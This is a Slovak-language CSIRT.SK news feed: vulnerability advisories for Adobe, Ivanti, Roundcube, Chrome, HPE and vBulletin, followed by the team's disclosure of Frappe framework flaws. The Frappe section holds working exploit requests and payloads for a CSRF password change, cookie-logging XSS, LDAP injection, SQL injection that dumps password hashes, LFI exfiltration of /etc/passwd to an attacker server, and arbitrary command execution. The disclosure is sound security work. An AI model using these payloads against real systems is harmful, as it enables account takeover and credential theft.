CVE-2025-43585 (CVSS skóre 8,2)

Chybu spočívajúcu v nesprávnej autorizáciu by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie bezpečnostného prvku a získanie úplnej kontroly nad systémom. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

Adobe InDesign:

CVE-2025-30317, CVE-2025-43558, CVE-2025-43589, CVE-2025-43590, CVE-2025-43593 (CVSS skóre 7,8)

Zraniteľnosti spočívajú v zápise mimo povolených hodnôt (CVE-2025-43590, CVE-2025-43593, CVE-2025-43558), použití odalokovaného miesta v pamäti (CVE-2025-43589) a pretečení medzipamäte haldy (CVE-2025-30317) možno zneužiť na vykonanie škodlivého kódu.

Adobe Substance 3D Sampler:

CVE-2025-43581, CVE-2025-43588 (CVSS skóre 7,8)

Zápis mimo povolených hodnôt umožňuje vykonanie škodlivého kódu s následkom úplného narušenia dôvernosti, integrity a dostupnosti systému.

Acrobat DC, Acrobat Reader DC, Acrobat 2024, Acrobat 2020, Acrobat Reader 2020:

CVE-2025-43573, CVE-2025-43574, CVE-2025-43575, CVE-2025-43576 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v zápise mimo povolených hodnôt (CVE-2025-43575) a použití odalokovaného miesta v pamäti (CVE-2025-43573, CVE-2025-43574, CVE-2025-43576) možno zneužiť na vykonanie škodlivého kódu.

Adobe Substance 3D Painter:

CVE-2025-47108 (CVSS skóre 7,8)

Zraniteľnosť spočíva v zápise mimo povolených hodnôt a možno ju zneužiť na vykonanie škodlivého kódu.

Pozn.: Ak nie je uvedené inak, zneužitie všetkých vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený súbor.

Možné škody:

Vykonanie škodlivého kódu
Obídenie bezpečnostného prvku
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované v časti Zraniteľné systémy alebo na webových stránkach výrobcu uvedených v časti Zdroje. Zároveň odporúčame použiť používateľov, aby neotvárali správy a prílohy z neznámych a nedôveryhodných zdrojov.

Zdroje:

Vysoko závažné zraniteľnosti v produkte Ivanti Workspace Control

Marian Danko — Fri, 13 Jun 2025 12:14:56 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 3 vysoko závažné zraniteľnosti v produkte pre centralizovaný manažment zariadení a aplikácií Ivanti Workspace Control. Zraniteľnosti možno zneužiť na získanie prihlasovacích údajov uložených v aplikácii a úplné narušenie dôvernosti, integrity a dostupnosti systému.

Zraniteľné systémy:

Ivanti Workspace Control vo verziách 10.19.0.0 a starších

Opis zraniteľnosti:

CVE-2025-5353, CVE-2025-22455 (CVSS skóre 8,8) a CVE-2025-22463 (CVSS skóre 7,3)

Vysoko závažné zraniteľnosti spočívajú v existencii zabudovaných kryptografických kľúčov, ktoré by lokálny autentifikovaný útočník mohol zneužiť na dešifrovanie prihlasovacích údajov k SQL (CVE-2025-5353, CVE-2025-22455) a spravovanému prostrediu (CVE-2025-22463). Uvedené prihlasovacie údaje možno zneužiť v rámci ďalších útokov a na úplné narušenie dôvernosti, integrity a dostupnosti systému.

Možné škody:

Neoprávnený prístup k citlivým údajom
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Administrátorom Ivanti Workspace Control odporúčame vykonať bezodkladnú aktualizáciu systémov na verziu 10.19.10.0. Táto verzia vyžaduje použitie nového komponentu Shield API, ktorý slúži na autentifikáciu spojení ku Datastore. Kompletný návod na inštaláciu, konfiguráciu a manažment tohto komponentu môžete nájsť na stránke výrobcu.

Spoločnosť Ivanti informovala, že k 31.12.2026 ukončí poskytovanie technickej podpory pre tento produkt a odporúča migráciu na produkt Ivanti User Workspace Manager.

Zdroje:

Aktívne zneužívaná kritická zraniteľnosť v open-source webmailovom riešení RoundCube

Marian Danko — Fri, 13 Jun 2025 12:13:52 +0000

Vývojári populárnej webmailovej platformy Roundcube vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2025-49113 by vzdialený útočník mohol zneužiť na vzdialené vykonanie kódu zaslaním špeciálne vytvorenej požiadavky HTTP GET.

Zraniteľné systémy:

Roundcube vo verziách starších ako 1.15.10 LTS
Roundcube 1.6.X vo verziách starších ako 1.6.11

Opis zraniteľnosti:

CVE-2025-49113 (CVSSv3 skóre 9,9)

Kritická zraniteľnosť sa nachádza v skripte /program/actions/settings/upload.php a spočíva v absencii sanitizácie parametra _from, ktorú možno zneužiť na vykonanie kódu po deserializácii PHP objektov. Vzdialený autentifikovaný útočník by ju mohol zneužiť zaslaním špeciálne vytvorených HTTP GET požiadaviek. Zneužitie zraniteľnosti síce vyžaduje úspešné prihlásenie, ale prihlasovacie údaje možno podľa zdrojov získať rôznymi formami útokov (napr. phishing, brute-force, CSRF).

Útočníkom sa analýzou hotfixu vydaného 1. júna 2025 podarilo získať dostatok informácií na vytvorenie funkčného exploitu, ktorý je na predaj na hackerských fórach. V nadväznosti na túto skutočnosť bezpečnostní výskumníci zo spoločnosť FearsOff zverejnili aj Proof-of-Concept kód demonštrujúci spôsob zneužitia zraniteľnosti.

Možné škody:

Vzdialené vykonanie kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Roundcube na verzie 1.15.10 LTS alebo 1.6.11. Rovnako odporúčame preveriť logy Roundcube, sieťových a bezpečnostných prvkov na prítomnosť pokusov o zneužitie zraniteľnosti.

Zdroje:

Aktívne zneužívaná zero-day zraniteľnosť v prehliadači Chrome

Marian Danko — Fri, 13 Jun 2025 12:12:52 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť. CVE-2025-5419 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Chrome pre Windows a Mac vo verziách starších ako 137.0.7151.68/.69
Chrome pre Linux vo verziách starších ako 137.0.7151.68

Opis zraniteľnosti:

CVE-2025-5419 (CVSSv3 skóre 8,8)

Zraniteľnosť vysokej závažnosti sa nachádza v komponente V8 a vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na čítanie a zápis mimo povolených hodnôt, s potenciálom pre vzdialené vykonanie kódu.

Pozn.: Zraniteľnosť je podľa spoločnosti Google aktívne zneužívaná.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu prehliadača Chrome na najnovšie verzie 137.0.7151.68/.69 (Windows, Mac) a 137.0.7151.68 (Linux).

Zdroje:

Kritická zraniteľnosť v produkte Hewlett Packard Enterprise StoreOnce

Marian Danko — Thu, 12 Jun 2025 15:37:50 +0000

Spoločnosť Hewlett Packard Enterprise vydala bezpečnostné aktualizácie svojho riešenia pre deduplikáciu, zálohovanie a obnovu dát StoreOnce, ktoré opravujú 8 zraniteľností. Jedna z nich je označená ako kritická. CVE-2025-37093 možno zneužiť na obídenie mechanizmov autentifikácie a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

HPE StoreOnce vo verziách starších ako 4.3.11

Opis zraniteľnosti:

CVE-2025-37093 (CVSSv3 skóre 9,8)

Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie v rámci metódy machineAccountCheck. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na získanie neoprávneného prístupu do systému a získanie úplnej kontroly nad systémom.

CVE-2025-37089, CVE-2025-37091, CVE-2025-37092, CVE-2025-37096 (CVSSv3 skóre 7,2)

Vysoko závažné zraniteľnosti spočívajú v nedostatočnom overovaní používateľských vstupov v rámci metód setLocateBeaconOnHardware, queryHardwareReportLocally, doExecute a getServerCertificate a možno ich zneužiť na vzdialené vykonanie kódu v kontexte používateľa root.

Ostatné zraniteľnosti možno zneužiť na realizáciu útokov Server-Side Request Forgery (CVE-2025-37090), vykonanie neoprávnených zmien v systéme (CVE-2025-37094) a získanie neoprávneného prístupu k citlivým údajom (CVE-2025-37095).

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu produktu HPE StoreOnce na verziu 4.3.11 alebo novšiu.

Zdroje:

Aktívne zneužívané kritické zraniteľnosti v platforme vBulletin

Marian Danko — Thu, 12 Jun 2025 15:34:04 +0000

Bezpečnostní výskumníci zverejnili informácie o aktívne zneužívaných kritických zraniteľnostiach v redakčnom systéme pre tvorbu online fór vBulletin. CVE-2025-48827 a CVE-2025-48828 by vzdialený neautentifikovaný útočník mohol zneužiť na volanie chránených metód a vzdialené vykonanie kódu.

Zraniteľné systémy:

vBulletin vo verziách 5.0.0 až 5.7.5
vBulletin vo verziách 6.0.0 až 6.0.3

Pozn.: Zraniteľnosti je možné zneužiť len na systémoch, kde vBulletin beží na PHP vo verzii 8.1 alebo novšej.

Opis zraniteľnosti:

CVE-2025-48827 (CVSSv3 skóre 10,0)

Kritická zraniteľnosť spočíva v nesprávnom využití PHP Reflecion API, ktoré kvôli zmenám zavedeným v PHP vo verziách od 8.1 možno zneužiť na volanie chránených metód API. Zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť navštívením špeciálne vytvorených URL v tvare /api.php?method=chranenaMetoda.

CVE-2025-48828 (CVSSv3 skóre 9,0)

Kritická zraniteľnosť sa nachádza v nástroji pre spracovanie vzorov a vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného vzoru obsahujúceho Template Conditionals mohol zneužiť na vzdialené vykonanie kódu PHP.

Pozn.: Zraniteľnosti sú aktívne zneužívané minimálne od mája 2025. Výrobca podľa spoločnosti Karma(In)Security vydal aktualizácie už v apríli 2024, ale bez poskytnutia bližších informácií. V súčasnosti zostáva veľké množstvo neaktualizovaných inštancií zraniteľných.

Možné škody:

Vzdialené vykonanie kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu verzií 6.x na Patch Level 1, verzie 5.7.5 na Patch Level 3, alebo prejsť na najnovšiu verziu 6.1.2. Odporúčame tiež preveriť logy vBulletin, sieťových a bezpečnostných prvkov na prítomnosť pokusov o zneužitie zraniteľností.

Zdroje:

Mesačný prehľad kritických zraniteľností máj 2025

Marian Danko — Wed, 04 Jun 2025 12:37:58 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci máj 2025.

Mesačný prehľad – 05/2025 PDF (521 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Vládna jednotka CSIRT získala medzinárodnú certifikáciu Trusted Introducer

Marian Danko — Wed, 04 Jun 2025 07:39:24 +0000

V máji sa Vládna jednotka CSIRT sa oficiálne stala druhým medzinárodne certifikovaným kyberbezpečnostným tímom na Slovensku. 27. mája 2025 prebrala osvedčenie o certifikácii „SIM3 Trusted introducer – certified“ na medzinárodnej konferencii 74th TF-CSIRT Meeting v nórskom Oslo a zaradila sa tak oficiálne medzi elitné svetové tímy zaberajúce sa kybernetickou bezpečnosťou. Certifikácia bola oficiálne schválená 10. mája riadiacim výborom Trusted Introducer, ktorá je najvyššou certifikačnou autoritou združujúcou kľúčové subjekty v oblasti kybernetickej bezpečnosti v Európe.

Certifikácia bola výsledkom externého auditu tímu. V prvej polovici roku 2024 požiadali členovia VJ CSIRT o vykonanie medzinárodnej certifikácie „SIM3 Trusted introducer – certified“. Následne počas roka viacerí členovia VJ CSIRT pracovali na zosúladení procesov s požiadavkami a zvyšovaní efektivity fungovania celej jednotky. Audit sa uskutočnil počas 10. a 11. decembra za osobnej prítomnosti audítorky, riaditeľky CERT.LV, lotyšského CERTu (organizácia v Lotyšsku zastrešujúca všetku agendu súvisiacu s kybernetickou bezpečnosťou v krajine).

Získanie štatútu certifikovaného tímu umožní ešte lepšiu spoluprácu a výmenu informácií VJ CSIRT na medzinárodnej úrovni a efektívnejšiu komunikáciu počas incidentov s inými jednotkami CSIRT ako aj inými organizáciami zaoberajúcimi sa kybernetickou bezpečnosťou. CSIRT.SK sa zaradila medzi rešpektované organizácie kybernetickej bezpečnosti v Európskej únii.

Pripravili sme pre vás návody ako používať a odhaľovať generatívnu AI

Marian Danko — Tue, 03 Jun 2025 08:45:37 +0000

CSIRT.SK pre vás pripravil prehľadné návody, ako používať generatívne modely AI z pohľadu kybernetickej a informačnej bezpečnosti, a tiež ako odhaľovať texty písané, či inšpirované modelmi AI. Veríme, že využitie si nájdu medzi učiteľmi, ale aj u všetkých, ktorí sa zaujímajú o tému AI a chcú bezpečne narábať so svojimi údajmi.

Zraniteľnosti Frappe Framework

Marian Danko — Mon, 19 May 2025 15:12:28 +0000

Zhrnutie

Stručný prehľad pythonovského frameworku Frappe, ktorý vykonali výskumníci CSIRT.SK, odhalil množstvo zraniteľností umožňujúcich útočníkom vykonávať rôzne druhy útokov. V základni kódu sa môže nachádzať množstvo ďalších chýb, ktoré len čakajú na objavenie.

Kód všetkých ukážok zneužitia zraniteľností je k dispozícii v repozitári github.

Všetky tieto zraniteľnosti boli otestované na frappe docker s obrazom frappe/erpnext:v15.54.4. Podľa našej vedomosti všetky exploity stále fungujú vo frappe/erpnext:v15.57.0 okrem obídenia CSRF. Je možné, že v novších verziách budú tieto zraniteľnosti opravené, keďže boli autorom nahlásené už pred niekoľkými mesiacmi. V prvej časti tohto článku si prejdeme konfiguráciu lokálneho prostredia na testovanie diskutovaných zraniteľností. Ak už máte spustený cieľ frappe, pokojne túto časť preskočte.

Konfigurovanie lokálneho testovacieho prostredia

Na nastavenie lokálneho testovacieho prostredia je potrebné mať nainštalovaný docker. Nakonfigurovanie pozostáva z troch hlavných krokov.

1. Vytvorenie kontajnera docker

1. Stiahnite si oficiálny repozitár github

git clone https://github.com/frappe/frappe_docker

2. V priečinku frappe_docker v súbore pwd.yml zmeňte všetky verzie obrazu frappe/erpnext na v15.54.4

sed -i -e "s/frappe\/erpnext:.*$/frappe\/erpnext:v15.54.4/g" pwd.yml

3. Pridajte súbor config.json do priečinku frappe_docker s nasledovným obsahom:

{ "db_host": "db", "db_port": 3306, "redis_cache": "redis://redis-cache:6379", "redis_queue": "redis://redis-queue:6379", "redis_socketio": "redis://redis-queue:6379", "socketio_port": 9000, "allowed_referrers": ["example.com"] }

Dôležitou časťou je allowed_referrers, ktorá je jednou zo zraniteľných funkcií.

4. Pridajte nový volume pre frontendovú službu v súbore pwd.yml, aby ste prepojili konfiguráciu spoločnej lokality so službou frappe. Volumes pre službu frontend by mali vyzerať nasledovne:

volumes: - sites:/home/frappe/frappe-bench/sites - logs:/home/frappe/frappe-bench/logs - ./config.json:/var/www/html/sites/common_site_config.json

5. Pridajte službu ldap v súbore pwd.yml aby bolo možné neskôr povoliť autentifikáciu ldap vo Frappe.

openldap: image: osixia/openldap container_name: openldap environment: LDAP_LOG_LEVEL: "256" LDAP_ORGANISATION: "Example Inc." LDAP_DOMAIN: "example.org" LDAP_BASE_DN: "" LDAP_ADMIN_PASSWORD: "admin" LDAP_CONFIG_PASSWORD: "config" LDAP_READONLY_USER: "false" LDAP_RFC2307BIS_SCHEMA: "false" LDAP_BACKEND: "mdb" LDAP_TLS: "true" LDAP_TLS_CRT_FILENAME: "ldap.crt" LDAP_TLS_KEY_FILENAME: "ldap.key" LDAP_TLS_DH_PARAM_FILENAME: "dhparam.pem" LDAP_TLS_CA_CRT_FILENAME: "ca.crt" LDAP_TLS_ENFORCE: "false" LDAP_TLS_CIPHER_SUITE: "SECURE256:-VERS-SSL3.0" LDAP_TLS_VERIFY_CLIENT: "demand" LDAP_REPLICATION: "false" LDAP_REMOVE_CONFIG_AFTER_SETUP: "true" LDAP_SSL_HELPER_PREFIX: "ldap" stdin_open: true volumes: - /var/lib/ldap - /etc/ldap/slapd.d - /container/service/slapd/assets/certs/ ports: - "389:389" - "636:636" domainname: "example.org" hostname: "ldap-server" phpldapadmin: image: osixia/phpldapadmin:latest container_name: phpldapadmin environment: PHPLDAPADMIN_LDAP_HOSTS: "openldap" PHPLDAPADMIN_HTTPS: "false" ports: - "8888:80" depends_on: - openldap

6. Nakoniec jednoducho spustite docker compose ako v bežnej inštalácii Frappe docker.

docker compose -f pwd.yml up -d

2. Inštalácia Frappe

Tento krok je jednoduchý. Stačí prejsť na :8080 a prejsť krokmi inštalácie. Predvolené prihlasovacie údaje používateľa sú Administrator:admin. Dokončenie inštalácie môže chvíľu trvať.

3. Konfigurácia LDAP

1.1. Konfigurácia autentifikácie LDAP vo Frappe

Po prihlásení ako Administrator choďte na :8080/app/ldap-settings.

V konfigurácii urobte nasledujúce nastavenia:

Directory Server: OpenLDAP
LDAP Server Url: ldap://openldap:389
Base Distinguished Name (DN): cn=admin,dc=example,dc=org
Password for Base DN: admin
LDAP search path for Users: dc=example,dc=org
LDAP search path for Groups: dc=example,dc=org
LDAP Search String: (&(objectClass=posixAccount)(uid={0}))
LDAP Email Field: mail
LDAP Username Field: uid
LDAP First Name Field: mail
Default User Type: Website User

Zaškrtnite pole Enabled a uložte nastavenia.

1.2. Naplňte databázu LDAP testovacími dátami

Keď máte pripravené dockerovské testovacie prostredie, skontrolujte ID kontajnera openldap a spustite v ňom shell.

Pre získanie ID zadajte nasledujúci príkaz:

docker ps | grep openldap | awk '{print $1}'

V našom prípade je výsledok 26dbb5abd343
Spustite BASH v kontajneri pomocou nasledujúceho príkazu:

docker exec -it 26dbb5abd343 /bin/bash

Zapíšte nasledujúce riadky do sample.ldif:

# Organizational Units

dn: ou=Users,dc=example,dc=org objectClass: organizationalUnit ou: Users

# Sample Users dn: uid=jdoe,ou=Users,dc=example,dc=org objectClass: inetOrgPerson objectClass: posixAccount objectClass: shadowAccount cn: John Doe sn: Doe givenName: John uid: jdoe mail: jdoe@example.org uidNumber: 1001 gidNumber: 1001 homeDirectory: /home/jdoe userPassword: {SSHA}C3xHC0Sg2llL/qbDdyZIFmEo/OU3VYQo

použite ldapadd pre pridanie záznamov do databázy:

ldapadd -x -D "cn=admin,dc=example,dc=org" -W -f dample.ldif

zadajte heslo pre ldap (admin), keď si ho aplikácia vyžiada

Po ukončení by ste mali mať možnosť prihlásiť sa cez ldap ako jdoe@example.org s heslom jdoe_secure_password.

Objavené zraniteľnosti

1. Cross-Site Request Forgery (CSRF)

Pre dosiahnutie CSRF vo frameworku Frappe potrebujeme zneužiť dve chyby zabezpečenia.

1.1. Obídenie validácie CSRF

Prvá chyba vznikla po pridaní commitu v novembri 2024 (https://github.com/frappe/frappe/commit/d4382dc02055ff19966f71ab1579ffaa22c1a0a8). Zraniteľná metóda, ktorá túto chybu obsahuje, je is_allowed_referrer.

def is_allowed_referrer(self): referrer = frappe.get_request_header("Referer") origin = frappe.get_request_header("Origin") # Get the list of allowed referrers from cache or configuration allowed_referrers = frappe.cache.get_value( "allowed_referrers", generator=lambda: frappe.conf.get("allowed_referrers", []), ) # Check if the referrer or origin is in the allowed list return (referrer and any(referrer.startswith(allowed) for allowed in allowed_referrers)) or ( origin and any(origin == allowed for allowed in allowed_referrers) )

Kontrola overuje iba to, či zadaný referrer začína povoleným referrerom. To znamená, že ak vývojár povolí doménu example.com, útočník môže použiť napríklad doménu example.com.attacker.com, ktorá prejde kontrolou. Útočník tak úspešne obíde overenie CSRF.

1.2. Spracúvanie požiadaviek GET a POST rovnakým spôsobom

Frappe CMS v niektorých prípadoch vo svojich obslužných programoch API spracúva požiadavky GET rovnakým spôsobom ako požiadavky POST. To umožňuje útočníkovi obísť atribút SameSite=Lax nastavený v session cookie.

Napríklad pri volaní koncového bodu API /api/method/frappe.utils.print_format.report_to_pdf môže útočník použiť požiadavku GET alebo POST na spustenie generovania PDF, čo uľahčuje zneužitie zraniteľnosti CSRF.

1.3. Jednoduchý príklad zneužitia zraniteľnosti CSRF

Ak útočník umiestni na svoju doménu example.com.attacker.com nasledujúci obsah HTML, môže zmeniť heslo návštevníka, ktorý je prihlásený do Frappe umiestneného na example.com (detailnejšie pri zraniteľnosti č. 3).

http-equiv="refresh" content="0; url=http://example.com/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info?profile_info=%7b%22new_password%22%3a%20%22TestPassword123456%3f%22%7d"/>

Keďže toto presmerovanie uskutočňuje požiadavku typu GET, session cookies budú odoslané spolu s požiadavkou kvôli atribútu SameSite=Lax. Hlavička Referrer bude tiež nastavená na example.com.attacker.com, prejde kontrolou is_allowed_referrer a úspešne sa vykoná.

Ďalším spôsobom zneužitia CSRF je útok na webový server pomocou LFI zneužívajúc CVE-2025-26240. Ak by bol obsah http na serveri útočníka nasledovný, útočník by videl obsah /etc/passwd odosielaný na jeho server počúvajúci na http://172.17.0.1:8888.

http-equiv="refresh" content="0; url=http://example.com/api/method/frappe.utils.print_format.report_to_pdf?html=++++++

`LFI+POC`

"/>

2. Stored XSS

Keď odošleme požiadavku POST obsahujúcu napríklad {"user_image":"http://\">"} ako hodnotu parametra profile_info, môžeme vidieť, že obrázok je vykreslený a cookies dokumentu sú zaznamenané v konzole.

Požiadavka:

POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/1.1 Host: localhost:8080 X-Frappe-CSRF-Token: 1a34e75a0c0471bf0138c5ab966040a59a2f5290f811314f19bb85c3 Cookie: sid=1612f02626922182dfbe581e3f3961a9c36ef1b14efa7b26f880715a Content-Length: 128 Content-Type: application/x-www-form-urlencoded profile_info=%7b%22user_image%22%3a%22http%3a%2f%2f%5c%22%3e%3cimg%20src%3dxyz%20onerror%3dconsole.log(document.cookie)%3e%22%7d

Výsledok:

Tento payload sa prejavuje aj na stránke :8080/app/home, hoci nie je viditeľný pre používateľa (payload sa stále vykonáva).

3. Zmena hesla

Útočník môže zmeniť heslo overeného používateľa aj bez toho, aby poznal jeho aktuálne heslo. To možno dosiahnuť odoslaním payloadu JSON {"new_password":" 0xdeadbeef"} do parametra profile_info v koncovom bode /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info.

Požiadavka:

POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/1.1 Host: localhost:8080 Cookie: system_user=no; user_image=; sid=c75135de8c12dbcaa933e6f92901703828da54eb463148587d323767; full_name=test; user_id=test%40test.test Content-Type: application/x-www-form-urlencoded Content-Length: 44
profile_info={"new_password"%3a"0xdeadbeef"}

Odpoveď:

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 16 May 2025 09:11:03 GMT Content-Type: application/json

Po úspešnom odoslaní požiadavky sa môže používateľ prihlásiť novým heslom.

Požiadavka:

POST /login HTTP/1.1 Host: localhost:8080 Content-Length: 43 Content-Type: application/x-www-form-urlencoded cmd=login&usr=test@test.test&pwd=0xdeadbeef

Odpoveď:

HTTP/1.1 200 OK Server: nginx/1.22.1 Set-Cookie: sid=5fbcd629e3d859ba69acfd8718ae79d6dac5d40b2754dafa7f6e859a; Expires=Fri, 23 May 2025 11:14:03 GMT; Max-Age=612000; HttpOnly; Path=/; SameSite=Lax

V kombinácii s obídením CSRF môže táto zraniteľnosť viesť k úplnému ovládnutiu používateľského konta.

Na zneužitie obídenia CSRF je potrebné najprv odoslať POST požiadavku na zmenu hesla a potom je možné heslo zmeniť aj pomocou GET požiadaviek nasledovne.

Požiadavka:

GET /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info?profile_info={"new_password"%3a"0xdeadbeef123"} HTTP/1.1 Host: localhost:8080 Cookie: sid=a4c9818f005fa628d936b0937e0b8da3486167b11ff1ff9a87767ab7

Odpoveď:

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 16 May 2025 09:32:12 GMT Content-Type: application/json Content-Length: 2044

Po zmene hesla sa môže používateľ prihlásiť s novými údajmi 0xdeadbeef123.

Požiadavka:

POST /login HTTP/1.1 Host: localhost:8080 X-Requested-With: XMLHttpRequest Content-Length: 47 Content-Type: application/x-www-form-urlencoded cmd=login&usr=test1@test.test&pwd=0xdeadbeef123

Odpoveď:

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 16 May 2025 09:32:18 GMT Content-Type: application/json Content-Length: 57 Connection: keep-alive Set-Cookie: sid=aecdcadc69852d2b9874d238b9ae3bb4206f70d27af00b92e8ee9b10; Expires=Fri, 23 May 2025 11:32:18 GMT; Max-Age=612000; HttpOnly; Path=/; SameSite=Lax

Zistili sme, že toto správanie je príliš nedeterministické na to, aby sa dalo ľahko zneužiť, ale rozhodli sme sa ho zahrnúť do článku, pretože je to problém a vektor útoku nie je príliš zložitý.

4. Zneužitie CVE-2025-26240 vo Frappe CMS – Autentifikované SSRF / LFI

Ako sme uviedli v našom predchádzajúcom článku o zraniteľnosti pdfkit – CVE-2025-26240 (blogový príspevok) – útočník môže zneužiť metódu from_string na dosiahnutie SSRF alebo LFI. V systéme Frappe CMS musí byť útočník autentifikovaný, aby mohol zavolať /api/method/frappe.utils.print_format.report_to_pdf endpoint.

Keďže Frappe pridáva niekoľko predvolených možností, musíme ich vyfabrikovať tak, aby sme zabezpečili, že sa zobrazia pred našimi vlastnými argumentmi. Nižšie je uvedený príklad dokumentu HTML, ktorý potrebujeme odoslať na dosiahnutie LFI v rámci Frappe:

`LFI POC`

V payloade, http://172.17.0.1:8888 je útočníkom kontrolovaný server so serverom Python počúvajúcim na porte 8888.

Po odoslaní HTML dostaneme obsah súboru /etc/passwd, presne tak, ako je to uvedené v našej analýze CVE-2025-26240 (blogový príspevok).

Podobne by sme mohli dosiahnuť SSRF použitím argumentu --script a bezprostredne po ňom pridať --disable-javascript a --enable-javascript. Keďže autori Frappe implementovali bezpečnostné nastavenia pre zakázanie JavaScriptu pomocou {"disable-javascript": "", "disable-local-file-access": ""}, táto manipulácia účinne obchádza túto ochranu.

5. Injektovanie LDAP

Zraniteľnosť umožňujúca injektovanie LDAP sa nachádza v ldap_settings.py, konkrétne v nasledujúcich metódach:

reset_password (riadok 339) (iba autentifikovaný používateľ) – Používateľský vstup sa používa priamo vo vyhľadávacom filtri LDAP search_filter = f"({self.ldap_email_field}={user}
- To umožňuje útočníkovi injektovať ľubovoľné vyhľadávacie filtre LDAP, čím môže získať záznamy používateľov alebo zmeniť správanie pri overovaní.
  
  Požiadavka:
  GET /api/method/frappe.integrations.doctype.ldap_settings.ldap_settings.reset_password?user=admin*&password=test&logout=0
- To sa dá zneužiť aj pomocou obídenia CSRF, čím sa dosiahne neautentifikovaná zmena hesla LDAP akéhokoľvek používateľa.
authenticate (riadok 311)
- Pri vytváraní vyhľadávacieho filtra LDAP sa používa používateľský vstup nebezpečným spôsobom user_filter = self.ldap_search_string.format(username)
- To môže útočníkovi umožniť vytvoriť vstup, ktorý manipuluje s dotazom LDAP, a tak prípadne získať prístup k citlivým informáciám používateľa.
  
  Požiadavka:
  POST /api/method/frappe.integrations.doctype.ldap_settings.ldap_settings.login Host: localhost:8080 Content-Length: 54 X-Requested-With: XMLHttpRequest Content-Type: application/json {“usr”:“adm)(|(cn=)(|(sn=)(|(cn=)))”, “pwd”:“test”}
- To sa dá zneužiť vo väčších databázach LDAP na časový útok, pretože aplikácia najprv skontroluje, či používateľ existuje, a potom sa pokúsi opätovne nadviazať spojenie s načítaným používateľom a poskytnutým heslom.

6. Autentifikovaná SQL injection

Dopyt SQL v metóde execute_query je formátovaný nasledovne:

query = """select {fields} from {tables} {conditions} {group_by} {order_by} {limit}""".format(**args)

Pre order_by a group_by je aplikovaný podobný filter. Obchádzaný filter sa nachádza v súbore frappe.model.db_query.py (riadok 1114):

if "select" in _lower and "from" in _lower:

Útočník môže obísť túto kontrolu nasledujúcim nastavením:

group_by = "name UNION SELECT '" order_by = "',null,...,null,name,password FROM __Auth"

To vedie k dopytu, ktorý extrahuje používateľské meno a hash hesla z tabuľky __Auth.

Odoslaním nasledujúcej požiadavky:

GET /api/method/frappe.desk.reportview.export_query?ignore_permissions=True&doctype=Notification+Settings&fields=*&file_format_type=CSV&group_by=name+UNION+SELECT+'&order_by=',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,name,password+FROM+__Auth HTTP/1.1 Host: localhost:8080 Cookie: system_user=no; user_image=; sid=1a04399debb6cfc1d63eb5f52d12fb03b03b8c2167e63a953f6d4404; full_name=jdoe%40example.org; user_id=jdoe%40example.org

Získame:

HTTP/1.1 200 OK Content-Disposition: filename="Notification Settings.csv" ... "admin@admin.admin","$pbkdf2-sha256$29000$SGnNOcc4Z.xdK6W0VsoZAw$4DtTeEuaTiqMbuNxjQW.DYWsrIy25qJuTvFWB5/ANnc"

To potvrdzuje, že autentizovaný útočník môže získať hash hesla z tabuľky __Auth, čo umožňuje offline útoky hrubou silou. Tabuľku Notification Settings sme použili preto, že sa zdá, že všetci používatelia majú pre ňu predvolene práva na export, rovnako ako napríklad pre tabuľku Tag a ďalšie.

7. Vykonávanie kódu

Posledná zraniteľnosť, o ktorej budeme diskutovať, nie je taká závažná, avšak môže viesť k zaujímavému zvýšeniu oprávnení v prípade, že sú kompromitovaným účtom nesprávne nastavené práva sudo.

Frappe používa príkazový riadok bench. Zároveň implementuje niekoľko vlastných príkazov, z ktorých jeden je run-patch. Run-patch má nedokumentovanú funkciu, ktorá umožňuje používateľovi spustiť kód Pythonu v jednoduchej funkcii Python exec bez akéhokoľvek sandboxu alebo obmedzení. Keď používateľ spustí príkaz bench run-patch 'execute:import os;os.system("touch /tmp/test.txt")', vytvorí sa súbor test.txt, ktorý ukazuje, že systémový príkaz bol úspešne vykonaný.

